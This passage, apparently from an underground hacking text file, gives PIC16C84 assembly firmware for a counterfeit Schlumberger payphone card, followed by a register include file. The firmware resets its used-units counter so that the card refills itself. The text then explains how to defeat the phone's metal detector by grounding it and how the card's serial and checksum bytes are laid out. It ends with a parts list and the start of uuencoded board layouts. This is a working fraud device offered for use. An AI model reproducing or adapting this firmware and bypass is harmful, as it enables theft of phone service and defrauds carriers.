btfss EE_FLAG,LSB ; Check for EEPROM Write Flag
goto MAIN ; If not set, jump back and wait some more
clrf EE_FLAG ; Clear EEPROM Write Flag
movlw 0c ; Units is stored in byte $0c
movwf EEADR ; Store in EEPROM Address Counter
movfw FUSCNT ; Get fused units counter
movwf EEDATA ; Store in EEDATA
bsf STATUS,RP0 ; Access register bank 1
bsf EECON1,WREN ; EEPROM Write Enable
bcf INTCON,GIE ; Disable all interupts
movlw 055 ; Magic Number #1 for EEPROM Write
movwf EECON2 ; Store in EECON2
movlw 0aa ; Magic Number #2 for EEPROM Write
movwf EECON2 ; Store in EECON2
bsf EECON1,WR ; Execute EEPROM Write
bsf INTCON,GIE ; Enable all interupts again!
bcf STATUS,RP0 ; Access register bank 0
goto MAIN ; Program main loop!
INTMAIN btfsc INTCON,INTF ; Check for INT Interupt
goto INTMAIN2 ; If set, jump to INTMAIN2
movlw B'00010000' ; Enable INT Interupt
movwf INTCON ; Store in INTCON
return
INTMAIN2
bcf STATUS,RP0 ; Access register bank 0
bsf PORTA,CRD_DTA ; Set Data Output High
btfsc PORTB,CRD_RST ; Check if reset is low
goto NO_RST ; If not, skip reset sequence
movfw RTCC ; Get RTCC Value
movwf TEMP4 ; Store in TEMP4
clrf RTCC ; Clear RTCC
movlw 055 ; Subtract $55 from TEMP4
subwf TEMP4,0 ; to check for card reset....
bnz NO_RST2 ; If not zero, jump to NO_RST
movlw 02 ; Unused one has $02 in FUSCNT
movwf FUSCNT ; Store full value in FUSCNT
bsf EE_FLAG,LSB ; Set EEPROM Write Flag
NO_RST2 bcf INTCON,INTF ; Clear INT Interupt Flag
return ; Mission Accomplished, return to sender
NO_RST movfw RTCC ; Get RTCC Value
movwf BITCNT ; Copy it to BITCNT
movwf TEMP1 ; Copy it to TEMP1
movwf TEMP2 ; Copy it to TEMP2
movlw 060 ; Load W with $60
subwf TEMP1,0 ; Subtract $60 from TEMP1
bz CREDIT ; If it is equal to $60
bc CREDIT ; or greater, then skip to units area
rrf TEMP2 ; Rotate TEMP2 one step right
rrf TEMP2 ; Rotate TEMP2 one step right
rrf TEMP2 ; Rotate TEMP2 one step right
movlw 0f ; Load W with $f
andwf TEMP2,1 ; And TEMP2 with W register
movfw TEMP2 ; Load W with TEMP2
addlw 0c ; Add W with $0c
movwf FSR ; Store data address in FSR
movfw INDIR ; Get databyte pointed at by FSR
movwf TEMP3 ; Store it in TEMP3
movlw 07 ; Load W with $07
andwf TEMP1,1 ; And TEMP1 with $07
bz NO_ROT ; If result is zero, skip shift loop
ROTLOOP rlf TEMP3 ; Shift TEMP3 one step left
decfsz TEMP1,1 ; Decrement TEMP1 until zero
goto ROTLOOP ; If not zero, repeat until it is!
NO_ROT btfss TEMP3,MSB ; Check if MSB of TEMP3 is set
bcf PORTA,CRD_DTA ; Clear Data Output
bcf INTCON,INTF ; Clear INT Interupt Flag
return ; Mission Accomplished, return to sender
CREDIT btfss PORTB,CRD_WE ; Check if Card Write Enable is High
goto NO_WRT ; Abort write operation if not...
btfss PORTB,CRD_RST ; Check if Card Reset is High
goto NO_WRT ; Abort write operation if not...
incf FUSCNT ; Increase used-up units counter
bsf EE_FLAG,LSB ; Set EEPROM Write-Flag
bcf INTCON,INTF ; Clear INT Interupt Flag
return ; Mission Accomplished, return to sender
NO_WRT movlw 060 ; Load W with $60
subwf BITCNT,1 ; Subtract $60 from BITCNT
movfw FUSCNT ; Load W with FUSCNT
subwf BITCNT,1 ; Subtract FUSCNT from BITCNT
bnc FUSED ; If result is negative, unit is fused
bcf PORTA,CRD_DTA ; Clear Data Output
FUSED bcf INTCON,INTF ; Clear INT Interupt Flag
return ; Mission Accomplished, return to sender
END
==============================================================================
<End of TELECARD.ASM>.
<Start of PICREG.EQU>.
==============================================================================
; PIC16Cxx Microcontroller Include File
PIC54 equ 0x1ff ; PIC16C54 Reset Vector
PIC55 equ 0x1ff ; PIC16C55 Reset Vector
PIC56 equ 0x3ff ; PIC16C56 Reset Vector
PIC57 equ 0x7ff ; PIC16C57 Reset Vector
PIC71 equ 0x000 ; PIC16C71 Reset Vector
PIC84 equ 0x000 ; PIC16C84 Reset Vector
INTVEC equ 0x004 ; PIC16C71/84 Interupt Vector
INDIR equ 0x000 ; Indirect File Reg Address Register
RTCC equ 0x001 ; Real Time Clock Counter
PCL equ 0x002 ; Program Counter Low Byte
STATUS equ 0x003 ; Status Register
FSR equ 0x004 ; File Select Register
PORTA equ 0x005 ; Port A I/O Register
PORTB equ 0x006 ; Port B I/O Register
PORTC equ 0x007 ; Port C I/O Register
ADCON0 equ 0x008 ; PIC16C71 A/D Control Reg 0
ADRES equ 0x009 ; PIC16C71 A/D Converter Result Register
EEDATA equ 0x008 ; PIC16C84 EEPROM Data Register
EEADR equ 0x009 ; PIC16C84 EEPROM Address Register
PCLATH equ 0x00a ; Program Counter High Bits
INTCON equ 0x00b ; Interrupt Control Register
TRISA equ 0x005 ; Port A I/O Direction Register
TRISB equ 0x006 ; Port B I/O Direction Register
TRISC equ 0x007 ; Port C I/O Direction Register
ADCON1 equ 0x008 ; PIC16C71 A/D Control Reg 1
EECON1 equ 0x008 ; PIC16C84 EEPROM Control Reg. 1
EECON2 equ 0x009 ; PIC16C84 EEPROM Control Reg. 2
OPTION equ 0x001 ; Option Register
MSB equ 0x007 ; Most-Significant Bit
LSB equ 0x000 ; Least-Significant Bit
TRUE equ 1
YES equ 1
FALSE equ 0
NO equ 0
; Status Register (f03) Bits
CARRY equ 0x000 ; Carry Bit
C equ 0x000 ; Carry Bit
DCARRY equ 0x001 ; Digit Carry Bit
DC equ 0x001 ; Digit Carry Bit
Z_BIT equ 0x002 ; Zero Bit
Z equ 0x002 ; Zero Bit
P_DOWN equ 0x003 ; Power Down Bit
PD equ 0x003 ; Power Down Bit
T_OUT equ 0x004 ; Watchdog Time-Out Bit
TO equ 0x004 ; Watchdog Time-Out Bit
RP0 equ 0x005 ; Register Page Select 0
RP1 equ 0x006 ; Register Page Select 1
IRP equ 0x007 ; Indirect Addressing Reg. Page Sel.
; INTCON Register (f0b) Bits
RBIF equ 0x000 ; RB Port change interrupt flag
INTF equ 0x001 ; INT Interrupt Flag
RTIF equ 0x002 ; RTCC Overflow Interupt Flag
RBIE equ 0x003 ; RB Port Ch. Interupt Enable
INTE equ 0x004 ; INT Interupt Enable
RTIE equ 0x005 ; RTCC Overflow Int. Enable
ADIE equ 0x006 ; PIC16C71 A/D Int. Enable
EEIE equ 0x006 ; PIC16C84 EEPROM Write Int. Enable
GIE equ 0x007 ; Global Interupt Enable
; OPTION Register (f81) Bits
PS0 equ 0x000 ; Prescaler Bit 0
PS1 equ 0x001 ; Prescaler Bit 1
PS2 equ 0x002 ; Prescaler Bit 2
PSA equ 0x003 ; Prescaler Assignment Bit
RTE equ 0x004 ; RTCC Signal Edge Select
RTS equ 0x005 ; RTCC Signal Source Select
INTEDG equ 0x006 ; Interupt Edge Select
RBPU equ 0x007 ; Port B Pull-up Enable
; ADCON0 Register (f08) Bits
ADON equ 0x000 ; A/D Converter Power Switch
ADIF equ 0x001 ; A/D Conversion Interupt Flag
ADGO equ 0x002 ; A/D Conversion Start Flag
CHS0 equ 0x003 ; A/D Converter Channel Select 0
CHS1 equ 0x004 ; A/D Converter Channel Select 1
ADCS0 equ 0x006 ; A/D Conversion Clock Select 0
ADCS1 equ 0x007 ; A/D Conversion Clock Select 0
; ADCON1 Register (f88) Bits
PCFG0 equ 0x000 ; RA0-RA3 Configuration Bit 0
PCFG1 equ 0x001 ; RA0-RA3 Configuration Bit 0
; EECON1 Register (f88) Bits
RD equ 0x000 ; PIC16C84 EEPROM Read Data Flag
WR equ 0x001 ; PIC16C84 EEPROM Write Data Flag
WREN equ 0x002 ; PIC16C84 EEPROM Write Enable Flag
WRERR equ 0x003 ; PIC16C84 EEPROM Write Error Flag
EEIF equ 0x004 ; PIC16C84 EEPROM Interupt Flag
; Some useful macros...
PUSH macro
movwf TEMP_W
swapf STATUS,W
movwf TEMP_S
endm
POP macro
swapf TEMP_S,W
movwf STATUS
swapf TEMP_W
swapf TEMP_W,W
endm
END
==============================================================================
<End of PICREG.EQU>.
The Security System:
~~~~~~~~~~~~~~~~~~~~
The security of the Schlumberger card system depends strongly on two things:
the metal detector in the card reader which senses if there is any metal on
the card where there shouldn't be any metal. Circuit traces on a home built
card is definitively made of metal. So, we have to figure out a way of
getting around this problem... Well, that isn't really too hard! They made
one really big mistake: If the metal detector is grounded, it doesn't work!!
If you look at the printout of my layouts for this card you'll find one big
area of the board that is rectangle shaped. In this area you should make a
big blob of solder that is between 2-3 millimetres high (approximately!).
When the card slides into the phone, the blob should be touching the metal
detector and since the blob is connected to ground the detector is also
being grounded. The fone also counts the number of times the metal detector
gets triggered by foreign objects in the card reader (Meaning that the
phone companys security staff can see if someone's attempting to use a fake
card that doesn't have this counter-measure on it!) and this is of course
included in the daily service report the fone sends to the central computer.
The second security lies in the cards first 12 bytes, it's not just what it
appears to be: a serial number, it's more than that. Part of the first byte is
a checksum of the number of 1's in the 11 bytes following it. Then byte 2 is
always $83, identifying the card as an electronic phonecard. Byte 3 and 4 is
the number of units on the card: The first nibble of byte 3 is always $1 and
then in the remaining three nibbles the number of units is stored in BCD code,
for example $11,$22 means 120 units (Two units is always fused at the factory
as a test, see the text by Stephane Bausson!) Then we have 4 bytes of card
serial number data, 2 bytes of card checksum (calculated with a 16 bit key
stored in the payfone ROM), 1 byte that is always $11, and then at last, byte
12 which is the country identifier.
The Parts Needed:
~~~~~~~~~~~~~~~~~
01 * PIC16C84, 4 MHz version, Surface Mounted (SOIC-18 Package)
01 * 4 MHz Ceramic Resonator, Surface Mounted
02 * 22 pF Capacitors, Surface Mounted (Size 1206).
01 * 0.8mm thick singlesided circuit board with P20 photoresist
The Construction:
~~~~~~~~~~~~~~~~~
Since this project is obviously not intended for the novice in electronics
I will not go into the basic details of soldering/etching circuit boards. If
you do not know much of this, ask a friend who does for help. If you want to
reach me for help, write to Phrack and ask them to forward the letter to me
as I wish to remain anonymous - This project will probably upset a lot of
phone companies and last but not least the guys at Schlumberger Tech.
The UUEncoded Part:
~~~~~~~~~~~~~~~~~~~
In this part of the phile you will find circuit board layouts for Tango PCB
as well as HP Laserjet binary files which will output the layout when printed
from DOS with the PRINT command.
You will also find another version of the source code to use if your PIC
prommer can't handle the programming of the 64 byte Data EEPROM array.
<UUEncoded Part Begins Here>.
------------------------------------------------------------------------------
section 1 of uuencode 5.22 of file telecard.zip by R.E.M.
begin 644 telecard.zip
M4$L#!!0````(``Q2,!V^G@!LQ@@``.P@```,````5$5,14-21#$N05--Q5G=
M<YLZ%G].9O(_G/1VM@_K9L%)D^YD^D`P2;GKV%[LW.P^=620;6TQ4!!QT[]^
M]8%``NQMLYU;SV0RH//3^=#Y%"?'1PM_,?8`X)4_G\+5>_L2YL])N,G3)"T+
MN,?;-'\&%^41>-LR1C3-7S'4V)\O&`AF'V:^:U^Z[R\&